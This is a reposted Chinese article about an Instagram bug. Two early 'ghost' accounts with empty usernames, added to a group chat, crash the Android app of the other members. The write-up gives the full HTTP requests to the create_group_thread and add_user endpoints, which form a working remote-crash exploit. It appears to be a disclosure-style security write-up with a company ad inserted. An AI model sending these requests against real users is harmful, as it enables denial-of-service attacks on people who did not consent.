這篇文章給大家介紹怎么利用兩個僵尸賬戶實現(xiàn)對任意Instagram賬戶的遠(yuǎn)程崩潰，內(nèi)容非常詳細(xì)，感興趣的小伙伴們可以參考借鑒，希望對大家能有所幫助。

尼元陽網(wǎng)站建設(shè)公司創(chuàng)新互聯(lián),尼元陽網(wǎng)站設(shè)計制作，有大型網(wǎng)站制作公司豐富經(jīng)驗。已為尼元陽上千多家提供企業(yè)網(wǎng)站建設(shè)服務(wù)。企業(yè)網(wǎng)站搭建\外貿(mào)營銷網(wǎng)站建設(shè)要多少錢，請找那個售后服務(wù)好的尼元陽做網(wǎng)站的公司定做！

通過對Instagram的安全研究，結(jié)合Instagram在構(gòu)造用戶名時遵循的規(guī)律機制，發(fā)現(xiàn)了Instagram后端數(shù)據(jù)庫中存在的兩個僵尸賬戶。然后通過創(chuàng)建聊天群組功能，利用這兩個僵尸賬戶的添加入群請求，可對群組成員實現(xiàn)Instagram應(yīng)用的遠(yuǎn)程崩潰攻擊。

從Instagram的用戶名構(gòu)造分析中發(fā)現(xiàn)兩個“幽靈賬戶”

在我對Instagram的安全研究中發(fā)現(xiàn)，Instagram在其后端數(shù)據(jù)庫中，使用了簡單的主鍵標(biāo)識符（Primary Key ID，PKID）遞增方式來定義分配其用戶賬戶，因此，我很好奇想去發(fā)現(xiàn)，Instagram社交網(wǎng)絡(luò)上創(chuàng)建的第一批用戶賬戶到底是些什么？后來，我發(fā)現(xiàn)當(dāng)PKID為3或4時，其指向的對應(yīng)賬戶為Instagram創(chuàng)始人之一的Mike Krieger。

Primary Keys：主鍵，又稱主碼，數(shù)據(jù)庫表中對儲存數(shù)據(jù)對象予以唯一和完整標(biāo)識的數(shù)據(jù)列或?qū)傩缘慕M合。一個數(shù)據(jù)表只能有一個主鍵，且主鍵的取值不能缺失，即不能為空值（Null）。主鍵有時也稱主鍵標(biāo)識符（Primary Key IDs，PKID）。

相較于全局標(biāo)識符（GUID）來說，從技術(shù)角度來看，Primary Key IDs（PKID）具備幾個優(yōu)點：容易記憶、增量變化的快速查詢、產(chǎn)生的數(shù)據(jù)庫碎片較少、遵循特定的模式、占用的存儲空間小。

有點意思了.....，但PKID = 1 或 PKID=2對應(yīng)的第一和第二個Instagram賬戶又是什么呢？經(jīng)我研究發(fā)現(xiàn)，他們有點不尋常，它們對應(yīng)的賬戶用戶名并不是合理的構(gòu)造：確切地說，是其用戶名數(shù)據(jù)結(jié)構(gòu)中包含一個空字符串""（""分配了一個長度為空的存儲空間），可以肯定的是這種分配設(shè)置絕對會導(dǎo)致其它問題。我的想法是，這兩個賬戶是在Instagram的初始測試階段創(chuàng)建的，但當(dāng)時它只不過是一個alpha版本，為什么到現(xiàn)在這種測試賬戶還未被刪除，仍然存在Instagram的后端數(shù)據(jù)庫中呢？現(xiàn)在，我們暫且把這兩個測試賬戶稱為“幽靈賬戶”（Ghost Users）或僵尸賬戶吧。

漏洞分析

可以肯定的是，如果服務(wù)端（Server-Side）對空字符串""的處理不當(dāng)，那么一定會導(dǎo)致某些安全風(fēng)險。由此我想到了一個點子：可以利用服務(wù)器后端對不當(dāng)格式畸形數(shù)據(jù)的錯誤解析，來觸發(fā)Instagram應(yīng)用程序的崩潰。那要是能遠(yuǎn)程讓其他Instagram用戶發(fā)生崩潰，是不是就更有意思了呢？

通過對Instagram功能的測試研究，我發(fā)現(xiàn)可以利用其中一個功能來實現(xiàn)上述的說的“遠(yuǎn)程崩潰”，那就是：Instagram消息標(biāo)簽（Messages Tab）下的群組（臨時聊天群）創(chuàng)建。這個功能對應(yīng)的群組創(chuàng)建請求和API為：

/api/v1/direct_v2/create_group_thread/

漏洞利用

我用我的 Samsung Galaxy S8+ 配合Instagram 8.0的測試賬戶，先來創(chuàng)建一個兩人的臨時聊天群組試試，其請求如下：

POST /api/v1/direct_v2/create_group_thread/ HTTP/1.1User-Agent: Instagram ....Accept-Language: en-USCookie: urlgen= ....Accept-Encoding: gzip, deflateHost:i.instagram.comX-FB-HTTP-Engine: LigerConnection: closeContent-Length: 353signed_body=d963d5f048924a58712d8bcf7912ac76a7c3c990199c7d59ac25e7990e142f49.{"recipient_users":"[xxxxxxxxxx]","_csrftoken":"WBpZmckmENi6eiubd26Osz6SIR3vtowu","thread_title":"bdbdbdbdbdxb","_uid":"12579513534","_uuid":"d18570eb-0663-40f4-bcc3-0c48a5031cee"}&ig_sig_key_version=4

其中，"recipient_users"代表的是我拉進(jìn)這個臨時群組的另外一名用戶（這里稱他為Victim），xxxxxxxxxx代表了他的instagram ID。重點是其中的JSON參數(shù)數(shù)據(jù)對結(jié)構(gòu)。現(xiàn)在，我和另外一名用戶的兩人臨時聊天群組創(chuàng)建完成。

緊接著，我通過另一個API，再來拖進(jìn)一名用戶加入這個群組。這里，我就要添加進(jìn)之前我們說的“幽靈用戶”了。其請求如下：

POST /api/v1/direct_v2/threads/yyyyyyyyyy/add_user/ HTTP/1.1User-Agent: Instagram ....Accept-Language: en-USCookie: urlgen= ....Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateHost:i.instagram.comX-FB-HTTP-Engine: LigerConnection: closeContent-Length: 109_csrftoken=Pod4ZKSSLYUYMPs2TxhN5Xkmsv6xUOsO&user_ids=["2"]&_uuid=d18570eb-0663-40f4-bcc3-0c48a5031cee

上述請求中，yyyyyyyyyy是第一個創(chuàng)建群組請求時，Instagram后端響應(yīng)消息中代表群組的ID號。我們在這個請求中，請注意，填充進(jìn)一個值為2的user_ids字段，也就是PKID=1或2的，前述的一個“幽靈用戶”。

當(dāng)我們把這個添加“幽靈用戶”的請求發(fā)出后，群組內(nèi)成員的另一名用戶（Victim）手機上的Instagram應(yīng)用程序立即就發(fā)生了崩潰，并且所有群組成員都會被強制退出群組。

這很大可能是由于Instagram后端在解析“幽靈用戶”用戶名時，其中的空字符串（""）引發(fā)的解析錯誤所導(dǎo)致的，以下是我從崩潰事件中的截獲的事件記錄：

漏洞影響

目前，該漏洞僅在Instagram for Android應(yīng)用環(huán)境中測試有效，利用該Bug漏洞，可以通過添加正常成員入群，然后再添加進(jìn)入前述的“幽靈用戶”，以此來實現(xiàn)對任意Instagram賬戶的遠(yuǎn)程崩潰攻擊。

關(guān)于怎么利用兩個僵尸賬戶實現(xiàn)對任意Instagram賬戶的遠(yuǎn)程崩潰就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學(xué)到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。